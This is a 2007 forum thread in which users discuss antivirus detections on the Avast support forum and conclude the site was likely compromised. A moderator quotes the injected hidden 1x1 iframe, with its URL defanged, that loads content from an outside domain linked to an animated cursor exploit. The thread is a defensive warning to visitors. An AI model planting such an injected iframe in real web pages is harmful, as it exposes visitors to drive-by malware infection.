Get this folks...

Discussion in 'malware problems & news' started by JeremyWW, Aug 24, 2007.

Thread Status:
Not open for further replies.
  1. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Alwil's credibility just hit the ground floor like an elevator with the wires cut...

    Go here and see what NOD32 does: h__p://forum.avast.com/
     
    Last edited by a moderator: Aug 24, 2007
  2. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Hmm... surprising, yet common sense says FP.
     
    Last edited by a moderator: Aug 24, 2007
  3. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!
     
    Last edited: Aug 24, 2007
  4. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.
     
  5. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!! :)
     
  6. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    Run an On Demand Scan and then look at your log.
     
  7. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Oooer o_O

    This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.
     
  8. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Doing it now...
     
  9. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.
     
  10. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    In depth scan finished: Clean machine...
     
  11. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224

    Look at the log, do you have a bunch of "internal errors"?
     
  12. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.
     
  13. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.
     
  14. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    No. I'm looking for that specific string, yes? Nothing...

    OK...just one, but nothing to do with anything...

    24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error
     
  15. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,367
    Noticed this earlyer.
    Thought LSP was giving me a FP.
    Maybe not.
    Site may have been hacked o_O
    I know this has happened to other sites forum and not in the past.
    Anyone else can confirm this?
     

    Attached Files:

  16. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    Correct, 2.7 works like a charm.
     
  17. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Yup...
     

    Attached Files:

  18. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    I have thousands of them. 228 pages in a word document!!
     
  19. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Hacking is looking quite likely here :doubt:
     
  20. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    Yup. Sure looks that way(More Likely). Or quite a few different AV's and Link Scanner are giving FPs(Less Likely).
     
  21. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

    <iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

    Thanks
    Bubba
    Nod32.gif
     
  22. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*
     
  23. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Hehe.. Just a bit funny though that many others detect it also then. :rolleyes:
     
  24. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Thats what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Havent seen one in months

    Quite exciting to get a real alert for once...
     
    Last edited by a moderator: Aug 24, 2007
  25. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    It is a real threat at the moment due to the iframe code and link still available at Avast.

    Windows Animated Cursor Stack Overflow Vulnerability

    portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link

    We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.

    Procede with caution,
    Bubba
     
Thread Status:
Not open for further replies.